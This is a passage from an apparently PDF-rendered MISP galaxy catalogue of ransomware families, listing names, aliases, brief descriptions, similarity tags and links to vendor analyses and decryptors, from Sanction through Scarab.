</table>

Sanction

Ransomware Based on HiddenTear, but heavily modified keygen

The tag is: misp-galaxy:ransomware="Sanction"

Table 5424. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/05/sanction-ransomware-3.html">http://id-ransomware.blogspot.com/2016/05/sanction-ransomware-3.html</a></td>
</tr>
</tbody>
</table>
Sanctions

Ransomware

The tag is: misp-galaxy:ransomware="Sanctions"

Sanctions is also known as:

• Sanctions 2017

Table 5425. Table References

Links

https://id-ransomware.blogspot.com/2017/03/sanctions-2017-ransomware.html

Sardoninir

Ransomware

The tag is: misp-galaxy:ransomware="Sardoninir"

Table 5426. Table References

Links

https://twitter.com/BleepinComputer/status/835955409953357825

Satana

Ransomware

The tag is: misp-galaxy:ransomware="Satana"

Satana has relationships with:

• similar: misp-galaxy:malpedia="Satana" with estimative-language:likelihood-probability="likely"

Table 5427. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2016/06/satana-ransomware/
https://blog.kaspersky.com/satana-ransomware/12558/
https://id-ransomware.blogspot.com/2016/06/satana-ransomware-0.html
Scraper

Ransomware

The tag is: misp-galaxy:ransomware="Scraper"

Table 5428. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://securelist.com/blog/research/69481/a-flawed-ransomware-encryptor/">http://securelist.com/blog/research/69481/a-flawed-ransomware-encryptor/</a></td>
</tr>
</tbody>
</table>

Serpico

Ransomware DetoxCrypto Variant

The tag is: misp-galaxy:ransomware="Serpico"

Serpico has relationships with:

- similar: misp-galaxy:malpedia="Serpico" with estimative-language:likelihood-probability="likely"

Table 5429. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://www.nyxbone.com/malware/Serpico.html">http://www.nyxbone.com/malware/Serpico.html</a></td>
</tr>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/08/serpico-ransomware.html">http://id-ransomware.blogspot.com/2016/08/serpico-ransomware.html</a></td>
</tr>
</tbody>
</table>

Shark

Ransomware

The tag is: misp-galaxy:ransomware="Shark"

Shark is also known as:

- Atom

Shark has relationships with:

- similar: misp-galaxy:rat="SharK" with estimative-language:likelihood-probability="likely"

Table 5430. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
</table>
**ShinoLocker**

Ransomware

The tag is: *misp-galaxy:ransomware=*"ShinoLocker"

Table 5431. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://twitter.com/JakubKroustek/status/760560147131408384">https://twitter.com/JakubKroustek/status/760560147131408384</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/08/shinolocker-ransomware.html">https://id-ransomware.blogspot.com/2016/08/shinolocker-ransomware.html</a></td>
</tr>
</tbody>
</table>

**Shujin**

Ransomware

The tag is: *misp-galaxy:ransomware=*"Shujin"

Shujin is also known as:

- KinCrypt

Shujin has relationships with:

- similar: *misp-galaxy:malpedia=*"Shujin" with *estimative-language:likelihood-probability=*"likely"

Table 5432. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/05/chinese-ransomware.html">http://id-ransomware.blogspot.com/2016/05/chinese-ransomware.html</a></td>
</tr>
</tbody>
</table>

**Simple_ENCODER**

Ransomware

The tag is: *misp-galaxy:ransomware=*"Simple_ENCODER"

Simple_ENCODER is also known as:

- Tilde

Table 5433. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="#">3060</a></td>
</tr>
</tbody>
</table>
SkidLocker

Ransomware Based on EDA2

The tag is: *misp-galaxy:ransomware*="SkidLocker"

SkidLocker is also known as:

- Pompous

Table 5434. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
</table>

Smash!

Ransomware

The tag is: *misp-galaxy:ransomware*="Smash!"

Table 5435. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
</table>

Smrss32

Ransomware

The tag is: *misp-galaxy:ransomware*="Smrss32"

Table 5436. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
</table>
SNSLocker

Ransomware Based on EDA2

The tag is: `misp-galaxy:ransomware="SNSLocker"`

*Table 5437. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://nyxbone.com/malware/SNSLocker.html">http://nyxbone.com/malware/SNSLocker.html</a></td>
</tr>
<tr>
<td><a href="http://nyxbone.com/images/articulos/malware/snslocker/16.png">http://nyxbone.com/images/articulos/malware/snslocker/16.png</a></td>
</tr>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/05/sns-locker-ransomware-aes-256-066.html">http://id-ransomware.blogspot.com/2016/05/sns-locker-ransomware-aes-256-066.html</a></td>
</tr>
</tbody>
</table>

Sport

Ransomware

The tag is: `misp-galaxy:ransomware="Sport"`

Stampado

Ransomware Coded by "The_Rainmaker" Randomly deletes a file every 6hrs up to 96hrs then deletes decryption key

The tag is: `misp-galaxy:ransomware="Stampado"`

*Table 5438. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221">https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221</a></td>
</tr>
<tr>
<td><a href="https://decrypter.emsisoft.com/stampado">https://decrypter.emsisoft.com/stampado</a></td>
</tr>
<tr>
<td><a href="https://cdn.streamable.com/video/mp4/kfh3.mp4">https://cdn.streamable.com/video/mp4/kfh3.mp4</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/07/stampado-ransomware-1.html">https://id-ransomware.blogspot.com/2016/07/stampado-ransomware-1.html</a></td>
</tr>
</tbody>
</table>

Strictor

Ransomware Based on EDA2, shows Guy Fawkes mask

The tag is: `misp-galaxy:ransomware="Strictor"`

*Table 5439. Table References*
**Surprise**

Ransomware Based on EDA2

The tag is: `misp-galaxy:ransomware="Surprise"`

*Table 5440. Table References*

Links

http://id-ransomware.blogspot.com/2016/05/surprise-ransomware-aes-256.html

**Survey**

Ransomware Still in development, shows FileIce survey

The tag is: `misp-galaxy:ransomware="Survey"`

*Table 5441. Table References*

Links


**SynoLocker**

Ransomware Exploited Synology NAS firmware directly over WAN

The tag is: `misp-galaxy:ransomware="SynoLocker"`

**SZF Locker**

Ransomware

The tag is: `misp-galaxy:ransomware="SZF Locker"`

*Table 5442. Table References*

Links


https://id-ransomware.blogspot.com/2016/06/szflocker-polish-ransomware-email.html
**TeamXrat**

Ransomware

The tag is: `misp-galaxy:ransomware="TeamXrat"`

Table 5443. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/">https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/</a></td>
</tr>
</tbody>
</table>

**TeslaCrypt 0.x - 2.2.0**

Ransomware Factorization

The tag is: `misp-galaxy:ransomware="TeslaCrypt 0.x - 2.2.0"`

TeslaCrypt 0.x - 2.2.0 is also known as:

- AlphaCrypt

Table 5444. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://www.talosintel.com/teslacrypt_tool/">http://www.talosintel.com/teslacrypt_tool/</a></td>
</tr>
</tbody>
</table>

**TeslaCrypt 3.0+**

Ransomware 4.0+ has no extension

The tag is: `misp-galaxy:ransomware="TeslaCrypt 3.0+"`

Table 5445. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://www.welivesecurity.com/2016/05/18/eset-releases-decryptor-recent-variants-teslacrypt-ransomware/">http://www.welivesecurity.com/2016/05/18/eset-releases-decryptor-recent-variants-teslacrypt-ransomware/</a></td>
</tr>
<tr>
<td><a href="https://blog.kaspersky.com/raknidecryptor-vs-teslacrypt/12169/">https://blog.kaspersky.com/raknidecryptor-vs-teslacrypt/12169/</a></td>
</tr>
</tbody>
</table>

**TeslaCrypt 4.1A**

Ransomware

The tag is: `misp-galaxy:ransomware="TeslaCrypt 4.1A"`
Table 5446. Table References

Links


http://www.welivesecurity.com/2016/05/18/eset-releases-decryptor-recent-variants-teslacrypt-ransomware/

https://blog.kaspersky.com/raknidecryptor-vs-teslacrypt/12169/

https://www.endgame.com/blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack-chain

TeslaCrypt 4.2

Ransomware

The tag is: misp-galaxy:ransomware="TeslaCrypt 4.2"

Table 5447. Table References

Links


http://www.welivesecurity.com/2016/05/18/eset-releases-decryptor-recent-variants-teslacrypt-ransomware/

https://blog.kaspersky.com/raknidecryptor-vs-teslacrypt/12169/


Threat Finder

Ransomware Files cannot be decrypted Has a GUI

The tag is: misp-galaxy:ransomware="Threat Finder"

TorrentLocker

Ransomware Newer variants not decryptable. Only first 2 MB are encrypted

The tag is: misp-galaxy:ransomware="TorrentLocker"

TorrentLocker is also known as:

- Crypt0L0cker
- CryptoFortress
- Teerac
TorrentLocker has relationships with:

- similar: misp-galaxy:ransomware="CryptoFortress" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="CryptoFortress" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="TorrentLocker" with estimative-language:likelihood-probability="likely"

**Table 5448. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/">http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/PolarToffee/status/804008236600934403">https://twitter.com/PolarToffee/status/804008236600934403</a></td>
</tr>
<tr>
<td><a href="http://blog.talosintelligence.com/2017/03/crypt0l0cker-torrentlocker-old-dog-new.html">http://blog.talosintelligence.com/2017/03/crypt0l0cker-torrentlocker-old-dog-new.html</a></td>
</tr>
<tr>
<td><a href="http://id-ransomware.blogspot.ru/2016/05/torrentlocker-ransomware-aes-cbc-2048.html">http://id-ransomware.blogspot.ru/2016/05/torrentlocker-ransomware-aes-cbc-2048.html</a></td>
</tr>
</tbody>
</table>

**TowerWeb**

Ransomware

The tag is: misp-galaxy:ransomware="TowerWeb"

**Table 5449. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/06/towerweb-ransonware-100.html">https://id-ransomware.blogspot.com/2016/06/towerweb-ransonware-100.html</a></td>
</tr>
</tbody>
</table>

**Toxcrypt**

Ransomware

The tag is: misp-galaxy:ransomware="Toxcrypt"

**Table 5450. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/06/toxcrypt-ransomware-aes-crypto-0.html">https://id-ransomware.blogspot.com/2016/06/toxcrypt-ransomware-aes-crypto-0.html</a></td>
</tr>
</tbody>
</table>

**Trojan**

Ransomware
The tag is: `misp-galaxy:ransomware="Trojan"`

Trojan is also known as:

- BrainCrypt

Table 5451. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://download.bleepingcomputer.com/demonslay335/BrainCryptDecrypter.zip">https://download.bleepingcomputer.com/demonslay335/BrainCryptDecrypter.zip</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/PolarToffee/status/811249250285842432">https://twitter.com/PolarToffee/status/811249250285842432</a></td>
</tr>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/12/braincrypt-ransomware.html">http://id-ransomware.blogspot.com/2016/12/braincrypt-ransomware.html</a></td>
</tr>
</tbody>
</table>

**Troladesh orShade, XTBL**

Ransomware May download additional malware after encryption

The tag is: `misp-galaxy:ransomware="Troladesh orShade, XTBL"`

Troladesh orShade, XTBL is also known as:

- Shade
- Troladesh

Table 5452. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://www.nyxbone.com/malware/Troladesh.html">http://www.nyxbone.com/malware/Troladesh.html</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/06/troladesh-ransomware-email.html">https://id-ransomware.blogspot.com/2016/06/troladesh-ransomware-email.html</a></td>
</tr>
</tbody>
</table>

**TrueCrypter**

Ransomware

The tag is: `misp-galaxy:ransomware="TrueCrypter"`

Table 5453. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/04/truecrypter-ransomware.html">http://id-ransomware.blogspot.com/2016/04/truecrypter-ransomware.html</a></td>
</tr>
</tbody>
</table>
**Turkish**

Ransomware

The tag is: `misp-galaxy:ransomware="Turkish"`

*Table 5454. Table References*

**Links**

- https://twitter.com/struppigel/status/82199160637313024

**Turkish Ransom**

Ransomware

The tag is: `misp-galaxy:ransomware="Turkish Ransom"`

*Table 5455. Table References*

**Links**


**UmbreCrypt**

Ransomware CryptBoss Family

The tag is: `misp-galaxy:ransomware="UmbreCrypt"`

*Table 5456. Table References*

**Links**

- https://id-ransomware.blogspot.com/2016/06/umbrecrypt-ransomware-aes.html

**UnblockUPC**

Ransomware

The tag is: `misp-galaxy:ransomware="UnblockUPC"`

*Table 5457. Table References*

**Links**

Ungluk

Ransomware Ransom note instructs to use Bitmessage to get in contact with attacker - Secretishere.key - SECRETISHIDINGHEREINSIDE.KEY - secret.key

The tag is: misp-galaxy:ransomware="Ungluk"

Table 5458. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/05/bitmessage-ransomware-aes-256-25-btc.html">http://id-ransomware.blogspot.com/2016/05/bitmessage-ransomware-aes-256-25-btc.html</a></td>
</tr>
</tbody>
</table>

Unlock92

Ransomware

The tag is: misp-galaxy:ransomware="Unlock92"

Table 5459. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://twitter.com/malwrhunterteam/status/839038399944224768">https://twitter.com/malwrhunterteam/status/839038399944224768</a></td>
</tr>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2017/02/unlock26-ransomware.html">http://id-ransomware.blogspot.com/2017/02/unlock26-ransomware.html</a></td>
</tr>
</tbody>
</table>

VapeLauncher

Ransomware CryptoWire variant

The tag is: misp-galaxy:ransomware="VapeLauncher"

Table 5460. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://twitter.com/struppigel/status/839771195830648833">https://twitter.com/struppigel/status/839771195830648833</a></td>
</tr>
</tbody>
</table>

VaultCrypt

Ransomware

The tag is: misp-galaxy:ransomware="VaultCrypt"

VaultCrypt is also known as:

- CrypVault
- Zlader

VaultCrypt has relationships with:
• similar: misp-galaxy:ransomware="Zlader" with estimative-language:likelihood-probability="likely"

Table 5461. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="http://www.nyxbone.com/malware/russianRansom.html">http://www.nyxbone.com/malware/russianRansom.html</a></td>
</tr>
</tbody>
</table>

VBRANSOM 7

Ransomware

The tag is: misp-galaxy:ransomware="VBRANSOM 7"

Table 5462. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/BleepinComputer/status/817851339078336513">https://twitter.com/BleepinComputer/status/817851339078336513</a></td>
</tr>
</tbody>
</table>

VenusLocker

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="VenusLocker"

Table 5463. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://www.nyxbone.com/malware/venusLocker.html">http://www.nyxbone.com/malware/venusLocker.html</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/08/venuslocker-ransomware-aes-256.html">https://id-ransomware.blogspot.com/2016/08/venuslocker-ransomware-aes-256.html</a></td>
</tr>
</tbody>
</table>

Virlock

Ransomware Polymorphism / Self-replication

The tag is: misp-galaxy:ransomware="Virlock"

Virlock is also known as:

• NSMF

Table 5464. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="http://www.nyxbone.com/malware/Virlock.html">http://www.nyxbone.com/malware/Virlock.html</a></td>
</tr>
</tbody>
</table>
Virus-Encoder

Ransomware

The tag is: `misp-galaxy:ransomware="Virus-Encoder"`

Virus-Encoder is also known as:

- CrySiS

Table 5465. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="http://www.welivesecurity.com/2014/12/22/win32virlock-first-self-reproducing-ransomware-also-shape-shifter/">http://www.welivesecurity.com/2014/12/22/win32virlock-first-self-reproducing-ransomware-also-shape-shifter/</a></td>
</tr>
<tr>
<td><a href="http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip">http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip</a></td>
</tr>
<tr>
<td><a href="http://www.nyxbone.com/malware/virus-encoder.html">http://www.nyxbone.com/malware/virus-encoder.html</a></td>
</tr>
</tbody>
</table>

WildFire Locker

Ransomware Zyklon variant

The tag is: `misp-galaxy:ransomware="WildFire Locker"`

WildFire Locker is also known as:

- Hades Locker

WildFire Locker has relationships with:

- similar: `misp-galaxy:ransomware="Hades"` with `estimative-language:likelihood-probability="likely"`

Table 5466. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/">https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/06/wildfire-locker-ransomware-aes-256-cbc.html">https://id-ransomware.blogspot.com/2016/06/wildfire-locker-ransomware-aes-256-cbc.html</a></td>
</tr>
</tbody>
</table>

Xorist

Ransomware encrypted files will still have the original non-encrypted header of 0x33 bytes length
The tag is: `misp-galaxy:ransomware="Xorist"`

Table 5467. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://support.kaspersky.com/viruses/disinfection/2911">https://support.kaspersky.com/viruses/disinfection/2911</a></td>
</tr>
<tr>
<td><a href="https://decrypter.emsisoft.com/xorist">https://decrypter.emsisoft.com/xorist</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/siri">https://twitter.com/siri</a>_ urz/status/1006833669447839745</td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/06/xrtn-ransomware-rsa-1024-gnu-privacy.html">https://id-ransomware.blogspot.com/2016/06/xrtn-ransomware-rsa-1024-gnu-privacy.html</a></td>
</tr>
</tbody>
</table>

**XRTN**

Ransomware VaultCrypt family

The tag is: `misp-galaxy:ransomware="XRTN "`

**You Have Been Hacked!!!**

Ransomware Attempt to steal passwords

The tag is: `misp-galaxy:ransomware="You Have Been Hacked!!!"`

Table 5468. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://twitter.com/malwrhunterteam/status/808280549802418181">https://twitter.com/malwrhunterteam/status/808280549802418181</a></td>
</tr>
</tbody>
</table>

**Zcrypt**

Ransomware

The tag is: `misp-galaxy:ransomware="Zcrypt"`

Zcrypt is also known as:

- Zcryptor

Table 5469. Table References

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<thead>
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<tbody>
<tr>
<td><a href="https://blogs.technet.microsoft.com/mmpc/2016/05/26/link-lnk-to-ransom/">https://blogs.technet.microsoft.com/mmpc/2016/05/26/link-lnk-to-ransom/</a></td>
</tr>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/05/zcrypt-ransomware-rsa-2048-email.html">http://id-ransomware.blogspot.com/2016/05/zcrypt-ransomware-rsa-2048-email.html</a></td>
</tr>
</tbody>
</table>

**Zimbra**

Ransomware mpritsken@priest.com
The tag is: \textit{misp-galaxy:ransomware}="Zimbra"

\textit{Table 5470. Table References}

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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/06/zimbra-ransomware-aes-optzimbrastore.html">https://id-ransomware.blogspot.com/2016/06/zimbra-ransomware-aes-optzimbrastore.html</a></td>
</tr>
</tbody>
</table>

\textbf{Zlader}

Ransomware VaultCrypt family

The tag is: \textit{misp-galaxy:ransomware}="Zlader"

Zlader is also known as:

- Russian
- VaultCrypt
- CrypVault

Zlader has relationships with:

- similar: \textit{misp-galaxy:ransomware}="VaultCrypt" with estimative-language:likelihood-probability="likely"

\textit{Table 5471. Table References}

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<tbody>
<tr>
<td><a href="http://www.nyxbone.com/malware/russianRansom.html">http://www.nyxbone.com/malware/russianRansom.html</a></td>
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</table>

\textbf{Zorro}

Ransomware

The tag is: \textit{misp-galaxy:ransomware}="Zorro"

\textit{Table 5472. Table References}

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<tr>
<td><a href="https://twitter.com/BleepinComputer/status/844538370323812353">https://twitter.com/BleepinComputer/status/844538370323812353</a></td>
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<tr>
<td><a href="http://id-ransomware.blogspot.com/2017/03/zorro-ransomware.html">http://id-ransomware.blogspot.com/2017/03/zorro-ransomware.html</a></td>
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</table>

\textbf{Zyklon}

Ransomware Hidden Tear family, GNL Locker variant

The tag is: \textit{misp-galaxy:ransomware}="Zyklon"
Zyklon is also known as:

- GNL Locker
- Zyklon Locker

Zyklon has relationships with:

- similar: misp-galaxy:ransomware="GNL Locker" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Zyklon" with estimative-language:likelihood-probability="likely"

Table 5473. Table References

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<tbody>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2016/05/zyklon-locker-ransomware-windows-250.html">http://id-ransomware.blogspot.com/2016/05/zyklon-locker-ransomware-windows-250.html</a></td>
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</table>

**vxLock**

Ransomware

The tag is: misp-galaxy:ransomware="vxLock"

Table 5474. Table References

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<tr>
<td><a href="https://id-ransomware.blogspot.com/2017/01/vxlock-ransomware.html">https://id-ransomware.blogspot.com/2017/01/vxlock-ransomware.html</a></td>
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</table>

**Jaff**

We recently observed several large scale email campaigns that were attempting to distribute a new variant of ransomware that has been dubbed "Jaff". Interestingly we identified several characteristics that we have previously observed being used during Dridex and Locky campaigns. In a short period of time, we observed multiple campaigns featuring high volumes of malicious spam emails being distributed, each using a PDF attachment with an embedded Microsoft Word document functioning as the initial downloader for the Jaff ransomware.

The tag is: misp-galaxy:ransomware="Jaff"

Jaff has relationships with:

- similar: misp-galaxy:malpedia="Jaff" with estimative-language:likelihood-probability="likely"

Table 5475. Table References

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<tr>
<td><a href="http://blog.talosintelligence.com/2017/05/jaff-ransomware.html">http://blog.talosintelligence.com/2017/05/jaff-ransomware.html</a></td>
</tr>
</tbody>
</table>
Uiwix Ransomware

Using EternalBlue SMB Exploit To Infect Victims

The tag is: *misp-galaxy:ransomware="Uiwix Ransomware"

Uiwix Ransomware is also known as:

- UIWIX

Table 5476. Table References

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<tbody>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2017/05/uiwix-ransomware.html">http://id-ransomware.blogspot.com/2017/05/uiwix-ransomware.html</a></td>
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SOREBRECT

Fileless, Code-injecting Ransomware

The tag is: *misp-galaxy:ransomware="SOREBRECT"

Table 5477. Table References

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Cyron

claims it detected "Children Pornsites" in your browser history

The tag is: *misp-galaxy:ransomware="Cyron"

Table 5478. Table References

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<td><a href="https://twitter.com/struppigel/status/899524853426008064">https://twitter.com/struppigel/status/899524853426008064</a></td>
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<td><a href="https://id-ransomware.blogspot.com/2017/08/cyron-ransomware.html">https://id-ransomware.blogspot.com/2017/08/cyron-ransomware.html</a></td>
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</table>
**Kappa**

Made with OXAR builder; decryptable

The tag is: `misp-galaxy:ransomware="Kappa"`

**Trojan Dz**

CyberSplitter variant

The tag is: `misp-galaxy:ransomware="Trojan Dz"`

**Xolzsec**

ransomware written by self proclaimed script kiddies that should really be considered trollware

The tag is: `misp-galaxy:ransomware="Xolzsec"`

**FlatChestWare**

HiddenTear variant; decryptable

The tag is: `misp-galaxy:ransomware="FlatChestWare"`
SynAck

The ransomware does not use a customized desktop wallpaper to signal its presence, and the only way to discover that SynAck has infected your PC is by the ransom notes dropped on the user's desktop, named in the format: RESTORE_INFO-[id].txt. For example: RESTORE_INFO-4ABFA0EF.txt. In addition, SynAck also appends its own extension at the end of all files it encrypted. This file extensions format is ten random alpha characters for each file. For example: test.jpg.XbMijQiuoh. Experts believe the group behind SynAck uses RDP brute-force attacks to access remote computers and manually download and install the ransomware.

The tag is: misp-galaxy:ransomware="SynAck"

SynAck is also known as:

• Syn Ack

SynAck has relationships with:

• similar: misp-galaxy:malpedia="SynAck" with estimative-language:likelihood-probability="likely"

Table 5483. Table References

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<tr>
<td><a href="https://id-ransomware.blogspot.com/2017/09/synack-ransomware.html">https://id-ransomware.blogspot.com/2017/09/synack-ransomware.html</a></td>
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</table>

SyncCrypt

A new ransomware called SyncCrypt was discovered by Emsisoft security researcher xXToffeeXx that is being distributed by spam attachments containing WSF files. When installed these attachments will encrypt a computer and append the .kk extension to encrypted files.

The tag is: misp-galaxy:ransomware="SyncCrypt"

SyncCrypt has relationships with:

• similar: misp-galaxy:malpedia="SyncCrypt" with estimative-language:likelihood-probability="likely"

Table 5484. Table References

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<td><a href="http://id-ransomware.blogspot.com/2017/08/synccrypt-ransomware.html">http://id-ransomware.blogspot.com/2017/08/synccrypt-ransomware.html</a></td>
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</table>
Bad Rabbit

On October 24, 2017, Cisco Talos was alerted to a widespread ransomware campaign affecting organizations across eastern Europe and Russia. As was the case in previous situations, we quickly mobilized to assess the situation and ensure that customers remain protected from this and other threats as they emerge across the threat landscape. There have been several large scale ransomware campaigns over the last several months. This appears to have some similarities to Nyetya in that it is also based on Petya ransomware. Major portions of the code appear to have been rewritten. The distribution does not appear to have the sophistication of the supply chain attacks we have seen recently.

The tag is: misp-galaxy:ransomware="Bad Rabbit"

Bad Rabbit is also known as:

- BadRabbit
- Bad-Rabbit

Bad Rabbit has relationships with:

- similar: misp-galaxy:malpedia="EternalPetya" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:tool="NotPetya" with estimative-language:likelihood-probability="likely"

Table 5485. Table References

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<tr>
<td><a href="http://blog.talosintelligence.com/2017/10/bad-rabbit.html">http://blog.talosintelligence.com/2017/10/bad-rabbit.html</a></td>
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<td><a href="https://id-ransomware.blogspot.com/2017/10/badrabbit-ransomware.html">https://id-ransomware.blogspot.com/2017/10/badrabbit-ransomware.html</a></td>
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<tr>
<td><a href="https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/">https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/</a></td>
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<td><a href="https://securelist.com/bad-rabbit-ransomware/82851/">https://securelist.com/bad-rabbit-ransomware/82851/</a></td>
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<tr>
<td><a href="http://www.intezer.com/notpetya-returns-bad-rabbit/">http://www.intezer.com/notpetya-returns-bad-rabbit/</a></td>
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</table>

Halloware

A malware author by the name of Luc1F3R is peddling a new ransomware strain called Halloware for the lowly price of $40. Based on evidence gathered by Bleeping Computer, Luc1F3R started selling his ransomware this week, beginning Thursday.

The tag is: misp-galaxy:ransomware="Halloware"

Table 5486. Table References

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StorageCrypt

Recently BleepingComputer has received a flurry of support requests for a new ransomware being named StorageCrypt that is targeting NAS devices such as the Western Digital My Cloud. Victims have been reporting that their files have been encrypted and a note left with a ransom demand of between .4 and 2 bitcoins to get their files back. User's have also reported that each share on their NAS device contains a Autorun.inf file and a Windows executable named 美女与野兽.exe, which translates to Beauty and the beast. From the samples BleepingComputer has received, this Autorun.inf is an attempt to spread the 美女と野獣.exe file to other computers that open the folders on the NAS devices.

The tag is: misp-galaxy:ransomware="StorageCrypt"

Table 5487. Table References

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HC7

A new ransomware called HC7 is infecting victims by hacking into Windows computers that are running publicly accessible Remote Desktop services. Once the developers gain access to the hacked computer, the HC7 ransomware is then installed on all accessible computers on the network. Originally released as HC6, victims began posting about it in the BleepingComputer forums towards the end of November. As this is a Python-to-exe executable, once the script was extracted ID Ransomware creator Michael Gillespie was able determine that it was decryptable and released a decryptor. Unfortunately, a few days later, the ransomware developers released a new version called HC7 that was not decryptable. This is because they removed the hard coded encryption key and instead switched to inputting the key as a command line argument when the attackers run the ransomware executable. Thankfully, there may be a way to get around that as well so that victims can recover their keys.

The tag is: misp-galaxy:ransomware="HC7"

Table 5488. Table References

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<tr>
<td><a href="https://id-ransomware.blogspot.com/2017/12/hc7-ransomware.html">https://id-ransomware.blogspot.com/2017/12/hc7-ransomware.html</a></td>
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</table>
HC6

Predecessor of HC7

The tag is: misp-galaxy:ransomware="HC6"

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<td><a href="https://twitter.com/demonslay335/status/935622942737817601?ref_src=twsrc%5Etfw">https://twitter.com/demonslay335/status/935622942737817601?ref_src=twsrc%5Etfw</a></td>
</tr>
</tbody>
</table>

Table 5489. Table References

qkG

Security researchers have discovered a new ransomware strain named qkG that targets only Office documents for encryption and infects the Word default document template to propagate to new Word documents opened through the same Office suite on the same computer.

The tag is: misp-galaxy:ransomware="qkG"

qkG is also known as:

- QkG

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Table 5490. Table References

Scarab

